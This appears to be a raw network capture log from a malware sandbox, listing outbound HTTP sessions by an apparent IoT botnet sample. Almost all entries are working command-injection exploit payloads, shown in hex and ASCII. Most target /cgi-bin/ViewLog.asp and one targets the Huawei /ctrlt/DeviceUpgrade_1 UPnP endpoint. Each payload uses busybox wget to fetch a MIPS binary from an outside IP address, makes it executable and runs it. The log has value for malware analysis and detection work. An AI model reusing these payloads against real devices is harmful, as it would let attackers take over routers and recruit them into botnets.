                                              Nov 23, 2023 05:17:42.917992115 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:46.022267103 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:52.166218996 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.198281050 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              512192.168.2.134499894.122.61.688080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:42.949374914 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              513192.168.2.134706061.139.119.21923
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:43.259813070 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 37 3a 33 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:17:36Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              514192.168.2.134324494.121.118.1078080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:43.406488895 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              515192.168.2.1339918156.241.91.15337215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:43.559979916 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              516192.168.2.134801831.136.148.808080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:43.596627951 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:44.198240042 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:45.350270987 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:47.814270973 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:52.422238111 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:01.638211966 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.326184988 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              517192.168.2.134334094.120.217.978080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:43.856633902 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              518192.168.2.135770494.121.154.18080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:44.005903959 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              519192.168.2.134707461.139.119.21923
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:44.063822985 CET233INHTTP/1.0 200 OK
                                              Server: Proxy
                                              Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 33 20 31 32 3a 31 37 3a 33 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                              Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-23 12:17:37Auth Result: .


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              520192.168.2.135041031.136.233.1478080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:44.312247992 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:44.902249098 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:46.054255009 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:48.326365948 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:52.934246063 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:02.150214911 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:20.326174021 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              521192.168.2.133659895.213.184.1898080
                                              TimestampBytes transferredDirectionData
